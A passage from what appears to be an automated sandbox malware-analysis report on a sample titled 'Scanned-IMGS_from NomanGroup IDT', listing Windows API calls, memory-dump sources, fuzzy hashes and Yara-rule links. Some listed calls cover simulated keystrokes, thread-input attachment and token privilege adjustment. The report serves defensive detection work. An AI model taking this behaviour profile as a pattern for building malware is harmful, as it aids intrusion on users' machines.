                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 3dbda6d2fd20ab124da9210a4402cae117ed61e0d31c4b18bf1dea6d1e9ad21e
                                                                                • Instruction ID: d43e15464fd6c0844f66e967ed6465676f66fe105be293bc9392816981101b8b
                                                                                • Opcode Fuzzy Hash: 3dbda6d2fd20ab124da9210a4402cae117ed61e0d31c4b18bf1dea6d1e9ad21e
                                                                                • Instruction Fuzzy Hash: C6F03072105751CFDB349F69D490852B7F4AF5431E320897FE5DA8A612C7359888DF18
                                                                                Function 004BCCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0049EE51,00513630,00000002), ref: 004BCD26
                                                                                  • Part of subcall function 004BCC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,004BCD19,?,?,?), ref: 004BCC59
                                                                                  • Part of subcall function 004BCC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,004BCD19,?,?,?,?,0049EE51,00513630,00000002), ref: 004BCC6E
                                                                                  • Part of subcall function 004BCC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,004BCD19,?,?,?,?,0049EE51,00513630,00000002), ref: 004BCC7A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: File$Pointer$Write
                                                                                • String ID:
                                                                                • API String ID: 3847668363-0
                                                                                • Opcode ID: 38bf6cd23a36ee2d7f913a48f96fbd955d553f354213bd8ac241954b33a0744a
                                                                                • Instruction ID: 33fdfe05a6d2cc7c0d457d668c5240bec0d089083e364cb5ba406ac0bc88cd2c
                                                                                • Opcode Fuzzy Hash: 38bf6cd23a36ee2d7f913a48f96fbd955d553f354213bd8ac241954b33a0744a
                                                                                • Instruction Fuzzy Hash: AEE0397A400604EFC7219F8AD9808AABBF8FF84260710852FE99682111D7B5AA14DBA0
                                                                                Function 00452DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00452DC4
                                                                                  • Part of subcall function 00456B57: _wcslen.LIBCMT ref: 00456B6A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: LongNamePath_wcslen
                                                                                • String ID:
                                                                                • API String ID: 541455249-0
                                                                                • Opcode ID: ec3b41116186914c3087b6de08ba59543dda6686ca0dddcc43b85e5d74396574
                                                                                • Instruction ID: b3813515f1348c2ac89e49333c25e93f327d61641e06e34ca18d75f3502414e1
                                                                                • Opcode Fuzzy Hash: ec3b41116186914c3087b6de08ba59543dda6686ca0dddcc43b85e5d74396574
                                                                                • Instruction Fuzzy Hash: AFE0CD72A001245BCB1092599C46FEA77DDDFC8794F0500B6FD09D7259D974AD848554
                                                                                Function 00452B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00453837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00453908
                                                                                  • Part of subcall function 0045D730: GetInputState.USER32 ref: 0045D807
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00452B6B
                                                                                  • Part of subcall function 004530F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0045314E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                • String ID:
                                                                                • API String ID: 3667716007-0
                                                                                • Opcode ID: 58e1617603b3498156d542c6da3c2ab4ee53e6c93790917be78fe63c31095165
                                                                                • Instruction ID: 311c8405c699b76d09896de26d6ee01353f826dbfb62dba082d4cd8c6736256f
                                                                                • Opcode Fuzzy Hash: 58e1617603b3498156d542c6da3c2ab4ee53e6c93790917be78fe63c31095165
                                                                                • Instruction Fuzzy Hash: B3E0262270024402CA08BF32A8524AEA7999FE239BF40143FF846831A3CE2C494E825D
                                                                                Function 0049039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,00000000,?,00490704,?,?,00000000,?,00490704,00000000,0000000C), ref: 004903B7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: b841b5f9841a6a31ff49aa2214b9c9b803d76fe03a5d33a6fba41f71652427e1
                                                                                • Instruction ID: 41e867569942dd4c2af2621085654f525b1d514d630f7fd60b34fc218c90a9e6
                                                                                • Opcode Fuzzy Hash: b841b5f9841a6a31ff49aa2214b9c9b803d76fe03a5d33a6fba41f71652427e1
                                                                                • Instruction Fuzzy Hash: 50D06C3204014DBBDF028F84DD46EDA3FAAFB48714F014010BE1856021C732E822AB95
                                                                                Function 00451CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00451CBC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: InfoParametersSystem
                                                                                • String ID:
                                                                                • API String ID: 3098949447-0
                                                                                • Opcode ID: edd1eab9dda2fca5371daeff0941b5cffc8723caa7c4f548af05ec2db33ca9bb
                                                                                • Instruction ID: 63f487b4642e5a227f0ba0cab41c4bf1dc08bf45c4ab9a9faacce5b4714f74c4
                                                                                • Opcode Fuzzy Hash: edd1eab9dda2fca5371daeff0941b5cffc8723caa7c4f548af05ec2db33ca9bb
                                                                                • Instruction Fuzzy Hash: 3DC09B35380344BFF2248780BCCAF117755A77DB01F048401F6095D5E3C3A11415FB54
                                                                                Function 004C744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00455745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0045949C,?,00008000), ref: 00455773
                                                                                • GetLastError.KERNEL32(00000002,00000000), ref: 004C76DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 1214770103-0
                                                                                • Opcode ID: adee4f504084189d5a18a45201f7ec0418358afa361908444321e3ed9f8144ff
                                                                                • Instruction ID: b54e49926a575f786682fb7014f886729efdccee359c5284e136438fbb88e211
                                                                                • Opcode Fuzzy Hash: adee4f504084189d5a18a45201f7ec0418358afa361908444321e3ed9f8144ff
                                                                                • Instruction Fuzzy Hash: 258190342087019FC754EF29C491B6AB7E1AF48358F04495EFC865B392DB38AD49CF5A
                                                                                Function 015727FC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000001F4), ref: 01572811
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1707942713.0000000001570000.00000040.00000020.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1570000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                • Instruction ID: c4ac163cedb3b6a8af5070984620369ea41d733756b54b17982ecb108b5f9282
                                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                • Instruction Fuzzy Hash: 2EE09A7494020DAFDB00EFA4E5496AE7BB4EF04311F1005A1FD0596681DA319A548A62
                                                                                Function 00456246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CloseHandle.KERNELBASE(?,?,00000000,004924E0), ref: 00456266
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: ea493bc405342de2ba5669cb69390a17e8baa197d369a0ddc0528032ac5b77c7
                                                                                • Instruction ID: 11e496870182bed1ebcac11ebe8c5e83ae8d9c3446ec5ecd31d4b1940be512d2
                                                                                • Opcode Fuzzy Hash: ea493bc405342de2ba5669cb69390a17e8baa197d369a0ddc0528032ac5b77c7
                                                                                • Instruction Fuzzy Hash: 49E0B675400B01CFC3319F1AE804412FBF6FFE13623214A6FE8E596661D3B4588A8F55
                                                                                Function 01572800 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000001F4), ref: 01572811
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1707942713.0000000001570000.00000040.00000020.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1570000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                • Instruction ID: 61123221e4addccace2ea6983ee02afa27cfd2404fbcb2628a171785801526fd
                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                • Instruction Fuzzy Hash: EDE0E67494020DDFDB00EFB4D5496AE7FF4FF04301F100161FD01D2281D6319D508A62

                                                                                Non-executed Functions

                                                                                Function 004E9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00469BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00469BB2
                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 004E961A
                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004E965B
                                                                                • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 004E969F
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004E96C9
                                                                                • SendMessageW.USER32 ref: 004E96F2
                                                                                • GetKeyState.USER32(00000011), ref: 004E978B
                                                                                • GetKeyState.USER32(00000009), ref: 004E9798
                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004E97AE
                                                                                • GetKeyState.USER32(00000010), ref: 004E97B8
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004E97E9
                                                                                • SendMessageW.USER32 ref: 004E9810
                                                                                • SendMessageW.USER32(?,00001030,?,004E7E95), ref: 004E9918
                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 004E992E
                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 004E9941
                                                                                • SetCapture.USER32(?), ref: 004E994A
                                                                                • ClientToScreen.USER32(?,?), ref: 004E99AF
                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 004E99BC
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004E99D6
                                                                                • ReleaseCapture.USER32 ref: 004E99E1
                                                                                • GetCursorPos.USER32(?), ref: 004E9A19
                                                                                • ScreenToClient.USER32(?,?), ref: 004E9A26
                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 004E9A80
                                                                                • SendMessageW.USER32 ref: 004E9AAE
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 004E9AEB
                                                                                • SendMessageW.USER32 ref: 004E9B1A
                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 004E9B3B
                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 004E9B4A
                                                                                • GetCursorPos.USER32(?), ref: 004E9B68
                                                                                • ScreenToClient.USER32(?,?), ref: 004E9B75
                                                                                • GetParent.USER32(?), ref: 004E9B93
                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 004E9BFA
                                                                                • SendMessageW.USER32 ref: 004E9C2B
                                                                                • ClientToScreen.USER32(?,?), ref: 004E9C84
                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 004E9CB4
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 004E9CDE
                                                                                • SendMessageW.USER32 ref: 004E9D01
                                                                                • ClientToScreen.USER32(?,?), ref: 004E9D4E
                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 004E9D82
                                                                                  • Part of subcall function 00469944: GetWindowLongW.USER32(?,000000EB), ref: 00469952
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004E9E05
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                • String ID: @GUI_DRAGID$F$p#R
                                                                                • API String ID: 3429851547-1852618069
                                                                                • Opcode ID: 3d9488a3f4dfaf2c87bd0ed0c58f60e2569490239354f7a57e17164979a33dfe
                                                                                • Instruction ID: 6538b8c0ee4d959630ecdef6f938506b7e74973bb2340ced3714eaecb106ac75
                                                                                • Opcode Fuzzy Hash: 3d9488a3f4dfaf2c87bd0ed0c58f60e2569490239354f7a57e17164979a33dfe
                                                                                • Instruction Fuzzy Hash: 90428D70204281AFD724CF26CC84AABBBF5FF49315F14061AFA598B2E1D735AC55CB4A
                                                                                Function 004E4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 004E48F3
                                                                                • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 004E4908
                                                                                • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 004E4927
                                                                                • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 004E494B
                                                                                • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 004E495C
                                                                                • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 004E497B
                                                                                • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 004E49AE
                                                                                • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 004E49D4
                                                                                • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 004E4A0F
                                                                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 004E4A56
                                                                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 004E4A7E
                                                                                • IsMenu.USER32(?), ref: 004E4A97
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004E4AF2
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004E4B20
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004E4B94
                                                                                • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 004E4BE3
                                                                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 004E4C82
                                                                                • wsprintfW.USER32 ref: 004E4CAE
                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004E4CC9
                                                                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 004E4CF1
                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004E4D13
                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004E4D33
                                                                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 004E4D5A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                • String ID: %d/%02d/%02d
                                                                                • API String ID: 4054740463-328681919
                                                                                • Opcode ID: 6b52a4cfff7e2ddae4a88fa404c7d11271b93735a4c77d76b3b064d0d2661e8b
                                                                                • Instruction ID: d2aab39d6b9359b45c2c0192ea6f817cd7a890055db4f8923af366142a917a3c
                                                                                • Opcode Fuzzy Hash: 6b52a4cfff7e2ddae4a88fa404c7d11271b93735a4c77d76b3b064d0d2661e8b
                                                                                • Instruction Fuzzy Hash: BC12F171900294ABEB248F36CC89FAF7BB8EF85711F10412AF915DB2D1D7789941CB58
                                                                                Function 0046F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0046F998
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004AF474
                                                                                • IsIconic.USER32(00000000), ref: 004AF47D
                                                                                • ShowWindow.USER32(00000000,00000009), ref: 004AF48A
                                                                                • SetForegroundWindow.USER32(00000000), ref: 004AF494
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004AF4AA
                                                                                • GetCurrentThreadId.KERNEL32 ref: 004AF4B1
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004AF4BD
                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 004AF4CE
                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 004AF4D6
                                                                                • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 004AF4DE
                                                                                • SetForegroundWindow.USER32(00000000), ref: 004AF4E1
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004AF4F6
                                                                                • keybd_event.USER32(00000012,00000000), ref: 004AF501
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004AF50B
                                                                                • keybd_event.USER32(00000012,00000000), ref: 004AF510
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004AF519
                                                                                • keybd_event.USER32(00000012,00000000), ref: 004AF51E
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004AF528
                                                                                • keybd_event.USER32(00000012,00000000), ref: 004AF52D
                                                                                • SetForegroundWindow.USER32(00000000), ref: 004AF530
                                                                                • AttachThreadInput.USER32(?,000000FF,00000000), ref: 004AF557
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 4125248594-2988720461
                                                                                • Opcode ID: a19bf409e1061dac75d92f49d337adf17e5d91df4d94d51bc02860ec355c0458
                                                                                • Instruction ID: 2d6782e2a977b79f100172cc7694a7294bb5cc5dff254114117685ae812fd992
                                                                                • Opcode Fuzzy Hash: a19bf409e1061dac75d92f49d337adf17e5d91df4d94d51bc02860ec355c0458
                                                                                • Instruction Fuzzy Hash: 47315371A40258BFEB206BF55C89FBF7E6DEB45B50F100036FA00EA1D2C6B45D01AA69
                                                                                Function 004B1201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004B16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004B170D
                                                                                  • Part of subcall function 004B16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004B173A
                                                                                  • Part of subcall function 004B16C3: GetLastError.KERNEL32 ref: 004B174A
                                                                                • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 004B1286
                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 004B12A8
                                                                                • CloseHandle.KERNEL32(?), ref: 004B12B9
                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004B12D1
                                                                                • GetProcessWindowStation.USER32 ref: 004B12EA
                                                                                • SetProcessWindowStation.USER32(00000000), ref: 004B12F4
                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004B1310
                                                                                  • Part of subcall function 004B10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004B11FC), ref: 004B10D4
                                                                                  • Part of subcall function 004B10BF: CloseHandle.KERNEL32(?,?,004B11FC), ref: 004B10E9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
